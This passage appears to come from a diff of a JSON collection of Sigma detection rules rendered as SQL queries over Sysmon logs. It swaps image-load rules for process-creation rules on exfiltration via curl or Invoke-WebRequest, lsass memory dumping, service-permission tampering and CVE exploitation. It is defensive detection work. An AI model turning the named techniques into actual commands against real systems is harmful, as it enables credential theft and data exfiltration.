LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.impact", + "attack.t1529" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Valid user connecting using RDP" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "False positives depend on custom use of vsls-agent.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Alternate PowerShell Hosts - Image", - "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "status": "experimental", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of appcmd to add new URL rewrite rules" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ - "Very unlikely" + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "status": "experimental", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1047" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_recon_service.yml" + }, + { + "title": "Indirect Command Execution By Program Compatibility Wizard", + "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "status": "test", + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "author": "A. Sungurov , oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_pcwrun.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Change Default File Association Via Assoc", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Admin activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_cmd_assoc_execution.yml" }, { - "title": "System Drawing DLL Load", - "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "status": "experimental", - "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_dll_system_drawing_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": 